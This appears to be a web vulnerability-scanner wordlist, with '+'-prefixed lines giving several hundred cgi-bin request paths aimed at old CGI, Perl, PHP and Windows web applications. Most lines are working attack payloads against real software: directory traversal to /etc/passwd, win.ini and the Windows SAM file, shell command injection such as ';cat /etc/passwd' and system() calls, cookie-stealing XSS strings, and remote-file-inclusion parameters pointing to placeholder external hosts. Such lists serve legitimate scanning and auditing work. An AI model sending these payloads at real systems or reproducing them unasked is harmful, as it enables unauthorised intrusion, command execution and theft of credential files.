+cgi-bin/.htaccess.save
+cgi-bin/.htaccess~
+cgi-bin/.htpasswd
+cgi-bin/.nsconfig
+cgi-bin/.passwd
+cgi-bin/.www_acl
+cgi-bin/.wwwacl
+cgi-bin//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
+cgi-bin//_vti_pvt/doctodep.btr
+cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/AT-admin.cgi
+cgi-bin/AT-generate.cgi
+cgi-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
+cgi-bin/AnyBoard.cgi
+cgi-bin/AnyForm
+cgi-bin/AnyForm2
+cgi-bin/Backup/add-passwd.cgi
+cgi-bin/CGImail.exe
+cgi-bin/CSMailto.cgi
+cgi-bin/CSMailto/CSMailto.cgi
+cgi-bin/Cgitest.exe
+cgi-bin/Count.cgi
+cgi-bin/DCFORMS98.CGI
+cgi-bin/DCShop/auth_data/auth_user_file.txt
+cgi-bin/DCShop/orders/orders.txt
+cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
+cgi-bin/FileSeek.cgi?head=&foot=;cat%20/etc/passwd
+cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
+cgi-bin/FileSeek.cgi?head=;cat%20/etc/passwd|&foot=
+cgi-bin/FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd
+cgi-bin/FileSeek2.cgi?head=&foot=;cat%20/etc/passwd
+cgi-bin/FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=
+cgi-bin/FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=
+cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
+cgi-bin/FormMail.cgi?<script>alert(\"Vulnerable\");</script>
+cgi-bin/GW5/GWWEB.EXE
+cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
+cgi-bin/GW5/GWWEB.EXE?HELP=bad-request
+cgi-bin/GWWEB.EXE?HELP=bad-request
+cgi-bin/ImageFolio/admin/admin.cgi
+cgi-bin/MachineInfo
+cgi-bin/MsmMask.exe
+cgi-bin/MsmMask.exe?mask=/junk334
+cgi-bin/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
+cgi-bin/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
+cgi-bin/Pbcgi.exe
+cgi-bin/SGB_DIR/superguestconfig
+cgi-bin/SQLServ/sqlbrowse.asp?filepath=c:\&Opt=3
+cgi-bin/Upload.pl
+cgi-bin/VsSetCookie.exe?
+cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%
+cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\
+cgi-bin/WS_FTP.ini
+cgi-bin/Webnews.exe
+cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
+cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
+cgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
+cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
+cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
+cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd
+cgi-bin/add_ftp.cgi
+cgi-bin/addbanner.cgi
+cgi-bin/adduser.cgi
+cgi-bin/admin.cgi
+cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
+cgi-bin/admin.php
+cgi-bin/admin.php3
+cgi-bin/admin.pl
+cgi-bin/admin/admin.cgi
+cgi-bin/admin/setup.cgi
+cgi-bin/adminhot.cgi
+cgi-bin/adminwww.cgi
+cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
+cgi-bin/aglimpse
+cgi-bin/aglimpse.cgi
+cgi-bin/alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
+cgi-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
+cgi-bin/amadmin.pl
+cgi-bin/anacondaclip.pl?template=../../../../../../../../../../etc/passwd
+cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
+cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
+cgi-bin/anyboard.cgi
+cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
+cgi-bin/archie
+cgi-bin/architext_query.cgi
+cgi-bin/architext_query.pl
+cgi-bin/ash
+cgi-bin/astrocam.cgi
+cgi-bin/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
+cgi-bin/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/
+cgi-bin/auction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=
+cgi-bin/auctiondeluxe/auction.pl
+cgi-bin/auktion.cgi?menue=../../../../../../../../../../etc/passwd
+cgi-bin/auth_data/auth_user_file.txt
+cgi-bin/awl/auctionweaver.pl
+cgi-bin/awstats.pl
+cgi-bin/awstats/awstats.pl
+cgi-bin/ax-admin.cgi
+cgi-bin/ax.cgi
+cgi-bin/axs.cgi
+cgi-bin/badmin.cgi
+cgi-bin/banner.cgi
+cgi-bin/bannereditor.cgi
+cgi-bin/bash
+cgi-bin/bb-ack.sh
+cgi-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
+cgi-bin/bb-hist?HISTFILE=../../../../../../../../../../etc/passwd
+cgi-bin/bb-histlog.sh
+cgi-bin/bb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd
+cgi-bin/bb-rep.sh
+cgi-bin/bb-replog.sh
+cgi-bin/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+cgi-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
+cgi-bin/bbs_forum.cgi
+cgi-bin/betsie/parserl.pl/<script>alert('Vulnerable')</script>;
+cgi-bin/bigconf.cgi
+cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=
+cgi-bin/bizdb1-search.cgi
+cgi-bin/blog/
+cgi-bin/blog/mt-check.cgi
+cgi-bin/blog/mt-load.cgi
+cgi-bin/blog/mt.cfg
+cgi-bin/bnbform
+cgi-bin/bnbform.cgi
+cgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
+cgi-bin/boozt/admin/index.cgi?section=5&input=1
+cgi-bin/bsguest.cgi?email=x;ls
+cgi-bin/bslist.cgi?email=x;ls
+cgi-bin/build.cgi
+cgi-bin/bulk/bulk.cgi
+cgi-bin/c32web.exe/ChangeAdminPassword
+cgi-bin/c_download.cgi
+cgi-bin/cached_feed.cgi
+cgi-bin/cachemgr.cgi
+cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00
+cgi-bin/calendar
+cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
+cgi-bin/calendar.pl
+cgi-bin/calendar/calendar_admin.pl?config=|cat%20/etc/passwd|
+cgi-bin/calendar/index.cgi
+cgi-bin/calendar_admin.pl?config=|cat%20/etc/passwd|
+cgi-bin/calender_admin.pl
+cgi-bin/campas?%0acat%0a/etc/passwd%0a
+cgi-bin/cart.pl
+cgi-bin/cart.pl?db='
+cgi-bin/cartmanager.cgi
+cgi-bin/cbmc/forums.cgi
+cgi-bin/ccbill-local.cgi?cmd=MENU
+cgi-bin/ccbill-local.pl?cmd=MENU
+cgi-bin/cfgwiz.exe
+cgi-bin/cgforum.cgi
+cgi-bin/cgi-lib.pl
+cgi-bin/cgi-test.exe
+cgi-bin/cgi_process
+cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>
+cgi-bin/cgicso?query=AAA
+cgi-bin/cgiforum.pl?thesection=../../../../../../../../../../etc/passwd%00
+cgi-bin/cgimail.exe
+cgi-bin/cgitest.exe
+cgi-bin/cgiwrap
+cgi-bin/cgiwrap/%3Cfont%20color=red%3E
+cgi-bin/cgiwrap/~@USERS
+cgi-bin/cgiwrap/~JUNK(5)
+cgi-bin/cgiwrap/~root
+cgi-bin/change-your-password.pl
+cgi-bin/classifieds
+cgi-bin/classifieds.cgi
+cgi-bin/classifieds/classifieds.cgi
+cgi-bin/classifieds/index.cgi
+cgi-bin/clickcount.pl?view=test
+cgi-bin/clickresponder.pl
+cgi-bin/cmd.exe?/c+dir
+cgi-bin/cmd1.exe?/c+dir
+cgi-bin/code.php
+cgi-bin/code.php3
+cgi-bin/com5...................................................................................................................................................................................................
+cgi-bin/com5.java
+cgi-bin/com5.pl
+cgi-bin/commandit.cgi
+cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
+cgi-bin/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
+cgi-bin/common/listrec.pl
+cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
+cgi-bin/compatible.cgi
+cgi-bin/contents.htm
+cgi-bin/count.cgi
+cgi-bin/counter-ord
+cgi-bin/counterbanner
+cgi-bin/counterbanner-ord
+cgi-bin/counterfiglet-ord
+cgi-bin/counterfiglet/nc/
+cgi-bin/csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+cgi-bin/csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+cgi-bin/csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+cgi-bin/csNews.cgi
+cgi-bin/csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
+cgi-bin/csPassword.cgi
+cgi-bin/csPassword/csPassword.cgi
+cgi-bin/csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
+cgi-bin/csh
+cgi-bin/cstat.pl
+cgi-bin/cutecast/members/
+cgi-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
+cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
+cgi-bin/cvslog.cgi?file=<script>alert('Vulnerable')</script>
+cgi-bin/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
+cgi-bin/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
+cgi-bin/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
+cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
+cgi-bin/dasp/fm_shell.asp
+cgi-bin/data/fetch.php?page=
+cgi-bin/date
+cgi-bin/day5datacopier.cgi
+cgi-bin/day5datanotifier.cgi
+cgi-bin/db2www/library/document.d2w/show
+cgi-bin/db4web_c/dbdirname//etc/passwd
+cgi-bin/db_manager.cgi
+cgi-bin/dbman/db.cgi?db=no-db
+cgi-bin/dbmlparser.exe
+cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
+cgi-bin/dcshop/auth_data/auth_user_file.txt
+cgi-bin/dcshop/orders/orders.txt
+cgi-bin/dfire.cgi
+cgi-bin/diagnose.cgi
+cgi-bin/dig.cgi
+cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
+cgi-bin/displayTC.pl
+cgi-bin/dnewsweb
+cgi-bin/donothing
+cgi-bin/dose.pl?daily&somefile.txt&|ls|
+cgi-bin/dumpenv.pl
+cgi-bin/echo.bat
+cgi-bin/echo.bat?&dir+c:\
+cgi-bin/edit.pl
+cgi-bin/empower?DB=whateverwhatever
+cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/enter.cgi
+cgi-bin/environ.cgi
+cgi-bin/environ.pl
+cgi-bin/environ.pl?param1=<script>alert(document.cookie)</script>
+cgi-bin/erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
+cgi-bin/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
+cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
+cgi-bin/ex-logger.pl
+cgi-bin/excite
+cgi-bin/excite;IFS=\"$\";/bin/cat
+cgi-bin/ezadmin.cgi
+cgi-bin/ezboard.cgi
+cgi-bin/ezman.cgi
+cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
+cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
+cgi-bin/ezshopper2/loadpage.cgi
+cgi-bin/ezshopper3/loadpage.cgi
+cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
+cgi-bin/faxsurvey?cat%20/etc/passwd
+cgi-bin/filemail
+cgi-bin/filemail.pl
+cgi-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
+cgi-bin/fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
+cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
+cgi-bin/formmail.pl
+cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
+cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
+cgi-bin/fortune
+cgi-bin/foxweb.dll
+cgi-bin/foxweb.exe
+cgi-bin/fpadmin.htm
+cgi-bin/fpremadm.exe
+cgi-bin/fpsrvadm.exe
+cgi-bin/ftp.pl
+cgi-bin/ftpsh
+cgi-bin/gH.cgi
+cgi-bin/gbadmin.cgi?action=change_adminpass
+cgi-bin/gbadmin.cgi?action=change_automail
+cgi-bin/gbadmin.cgi?action=colors
+cgi-bin/gbadmin.cgi?action=setup
+cgi-bin/gbook/gbook.cgi?_MAILTO=xx;ls
+cgi-bin/gbpass.pl
+cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
+cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
+cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
+cgi-bin/getdoc.cgi
+cgi-bin/gettransbitmap
+cgi-bin/glimpse
+cgi-bin/gm-cplog.cgi
+cgi-bin/gm.cgi
+cgi-bin/guestbook.cgi
+cgi-bin/guestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|
+cgi-bin/guestbook.pl
+cgi-bin/handler
+cgi-bin/handler/netsonar;cat
+cgi-bin/hello.bat?&dir+c:\
+cgi-bin/hitview.cgi
+cgi-bin/horde/test.php
+cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html
+cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
+cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
+cgi-bin/htimage.exe
+cgi-bin/htimage.exe/path/filename?2,2
+cgi-bin/html2chtml.cgi
+cgi-bin/html2wml.cgi
+cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
+cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E
+cgi-bin/htsearch?-c/nonexistant
+cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
+cgi-bin/htsearch?exclude=%60/etc/passwd%60
+cgi-bin/ibill.pm
+cgi-bin/icat
+cgi-bin/if/admin/nph-build.cgi
+cgi-bin/ikonboard/help.cgi?
+cgi-bin/imageFolio.cgi
+cgi-bin/imagefolio/admin/admin.cgi
+cgi-bin/imagemap
+cgi-bin/imagemap.exe
+cgi-bin/include/new-visitor.inc.php
+cgi-bin/index.js0x70
+cgi-bin/index.pl
+cgi-bin/info2www
+cgi-bin/infosrch.cgi
+cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
+cgi-bin/ion-p?page=../../../../../etc/passwd
+cgi-bin/jailshell
+cgi-bin/jj
+cgi-bin/journal.cgi?folder=journal.cgi%00
+cgi-bin/ksh
+cgi-bin/lastlines.cgi?process
+cgi-bin/listrec.pl
+cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
+cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
+cgi-bin/log-reader.cgi
+cgi-bin/log/
+cgi-bin/log/nether-log.pl?checkit
+cgi-bin/login.cgi
+cgi-bin/login.pl
+cgi-bin/login.pl?course_id=\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;
+cgi-bin/logit.cgi
+cgi-bin/logs.pl
+cgi-bin/logs/
+cgi-bin/logs/access_log
+cgi-bin/logs/error_log
+cgi-bin/lookwho.cgi
+cgi-bin/ls
+cgi-bin/magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd
+cgi-bin/mail
+cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../etc/passwd%00
+cgi-bin/mailform.exe
+cgi-bin/mailit.pl
+cgi-bin/maillist.cgi
+cgi-bin/maillist.pl
+cgi-bin/mailnews.cgi
+cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
+cgi-bin/main_menu.pl
+cgi-bin/majordomo.pl
+cgi-bin/man.sh
+cgi-bin/man2html
+cgi-bin/mastergate/search.cgi?search=0&search_on=all
+cgi-bin/meta.pl
+cgi-bin/mgrqcgi
+cgi-bin/mini_logger.cgi
+cgi-bin/minimal.exe
+cgi-bin/mkilog.exe
+cgi-bin/mkplog.exe
+cgi-bin/mmstdod.cgi
+cgi-bin/moin.cgi?test
+cgi-bin/mojo/mojo.cgi
+cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
+cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/mrtg.cgi?cfg=blah
+cgi-bin/ms_proxy_auth_query/
+cgi-bin/mt-static/
+cgi-bin/mt-static/mt-check.cgi
+cgi-bin/mt-static/mt-load.cgi
+cgi-bin/mt-static/mt.cfg
+cgi-bin/mt/
+cgi-bin/mt/mt-check.cgi
+cgi-bin/mt/mt-load.cgi
+cgi-bin/mt/mt.cfg
+cgi-bin/multihtml.pl?multi=/etc/passwd%00html
+cgi-bin/musicqueue.cgi
+cgi-bin/myguestbook.cgi?action=view
+cgi-bin/namazu.cgi
+cgi-bin/nbmember.cgi?cmd=list_all_users
+cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
+cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
+cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
+cgi-bin/netpad.cgi
+cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
+cgi-bin/nimages.php
+cgi-bin/nlog-smb.cgi
+cgi-bin/nlog-smb.pl
+cgi-bin/non-existent.pl
+cgi-bin/noshell
+cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
+cgi-bin/nph-error.pl
+cgi-bin/nph-exploitscanget.cgi
+cgi-bin/nph-maillist.pl
+cgi-bin/nph-publish
+cgi-bin/nph-publish.cgi
+cgi-bin/nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
+cgi-bin/nph-test-cgi
+cgi-bin/ntitar.pl
+cgi-bin/opendir.php?/etc/passwd
+cgi-bin/orders/orders.txt
+cgi-bin/pagelog.cgi
+cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
+cgi-bin/parse-file
+cgi-bin/pass
+cgi-bin/passwd
+cgi-bin/passwd.txt
+cgi-bin/password
+cgi-bin/pbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E
+cgi-bin/perl
+cgi-bin/perl.exe
+cgi-bin/perl.exe?-v
+cgi-bin/perl?-v
+cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
+cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
+cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
+cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd
+cgi-bin/phf
+cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
+cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
+cgi-bin/photo/
+cgi-bin/photo/manage.cgi
+cgi-bin/php-cgi
+cgi-bin/php.cgi?/etc/passwd
+cgi-bin/plusmail
+cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
+cgi-bin/pollssi.cgi
+cgi-bin/post-query
+cgi-bin/post16.exe
+cgi-bin/post32.exe|dir%20c:\
+cgi-bin/post_query
+cgi-bin/postcards.cgi
+cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
+cgi-bin/ppdscgi.exe
+cgi-bin/printenv
+cgi-bin/printenv.tmp
+cgi-bin/probecontrol.cgi?command=enable&username=cancer&password=killer
+cgi-bin/processit.pl
+cgi-bin/profile.cgi
+cgi-bin/pu3.pl
+cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
+cgi-bin/query
+cgi-bin/query?mss=%2e%2e/config
+cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
+cgi-bin/quikstore.cfg
+cgi-bin/quizme.cgi
+cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
+cgi-bin/ratlog.cgi
+cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E
+cgi-bin/redirect
+cgi-bin/register.cgi
+cgi-bin/replicator/webpage.cgi/
+cgi-bin/responder.cgi
+cgi-bin/retrieve_password.pl
+cgi-bin/rguest.exe
+cgi-bin/rightfax/fuwww.dll/?
+cgi-bin/rksh
+cgi-bin/rmp_query
+cgi-bin/robadmin.cgi
+cgi-bin/robpoll.cgi
+cgi-bin/rpm_query
+cgi-bin/rsh
+cgi-bin/rtm.log
+cgi-bin/rwcgi60
+cgi-bin/rwcgi60/showenv
+cgi-bin/rwwwshell.pl
+cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
+cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
+cgi-bin/sbcgi/sitebuilder.cgi
+cgi-bin/scoadminreg.cgi
+cgi-bin/scripts/*%0a.pl
+cgi-bin/scripts/slxweb.dll/getfile?type=Library&file=[invalid
+cgi-bin/search
+cgi-bin/search.cgi
+cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
+cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
+cgi-bin/search.php?searchstring=<script>alert(document.cookie)</script>
+cgi-bin/search.pl
+cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
+cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
+cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
+cgi-bin/sendform.cgi
+cgi-bin/sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
+cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
+cgi-bin/sensepost.exe?/c+dir
+cgi-bin/session/adminlogin
+cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
+cgi-bin/sh
+cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
+cgi-bin/shop.pl/page=;cat%20shop.pl|
+cgi-bin/shop/auth_data/auth_user_file.txt
+cgi-bin/shop/orders/orders.txt
+cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
+cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
+cgi-bin/show.pl
+cgi-bin/showcheckins.cgi?person=<script>alert('Vulnerable')</script>
+cgi-bin/showuser.cgi
+cgi-bin/shtml.dll
+cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
+cgi-bin/simplestguest.cgi
+cgi-bin/simplestmail.cgi
+cgi-bin/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
+cgi-bin/smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
+cgi-bin/snorkerz.bat
+cgi-bin/snorkerz.cmd
+cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
+cgi-bin/spin_client.cgi?aaaaaaaa
+cgi-bin/ss
+cgi-bin/sscd_suncourier.pl
+cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
+cgi-bin/start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
+cgi-bin/stat.pl
+cgi-bin/stat/
+cgi-bin/stats-bin-p/reports/index.html
+cgi-bin/stats.pl
+cgi-bin/stats.prf
+cgi-bin/stats/
+cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
+cgi-bin/stats_old/
+cgi-bin/statsconfig
+cgi-bin/statusconfig.pl
+cgi-bin/statview.pl
+cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
+cgi-bin/store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
+cgi-bin/store/agora.cgi?page=whatever33.html
+cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
+cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
+cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
+cgi-bin/survey
+cgi-bin/survey.cgi
+cgi-bin/sws/admin.html
+cgi-bin/sws/manager.pl
+cgi-bin/tablebuild.pl
+cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
+cgi-bin/tcsh
+cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
+cgi-bin/test-cgi
+cgi-bin/test-cgi.bat
+cgi-bin/test-cgi.exe?<script>alert(document.cookie)</script>
+cgi-bin/test-cgi.tcl
+cgi-bin/test-cgi?/*
+cgi-bin/test-env
+cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
+cgi-bin/test.cgi
+cgi-bin/test/test.cgi
+cgi-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
+cgi-bin/testcgi.exe
+cgi-bin/testcgi.exe?<script>alert(document.cookie)</script>
+cgi-bin/testing_whatever
+cgi-bin/texis.exe/junk
+cgi-bin/texis/junk
+cgi-bin/texis/phine
+cgi-bin/textcounter.pl
+cgi-bin/tidfinder.cgi
+cgi-bin/tigvote.cgi
+cgi-bin/title.cgi
+cgi-bin/tpgnrock
+cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
+cgi-bin/troops.cgi
+cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
+cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
+cgi-bin/ultraboard.cgi
+cgi-bin/ultraboard.pl
+cgi-bin/unlg1.1
+cgi-bin/unlg1.2
+cgi-bin/update.dpgs
+cgi-bin/upload.cgi
+cgi-bin/uptime
+cgi-bin/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
+cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
+cgi-bin/utm/admin
+cgi-bin/utm/utm_stat
+cgi-bin/view-source
+cgi-bin/view-source?view-source
+cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
+cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>
+cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\"><script>alert('Vulnerable')</script>;
+cgi-bin/viewlogs.pl
+cgi-bin/viewsource?/etc/passwd
+cgi-bin/viralator.cgi
+cgi-bin/virgil.cgi
+cgi-bin/visadmin.exe
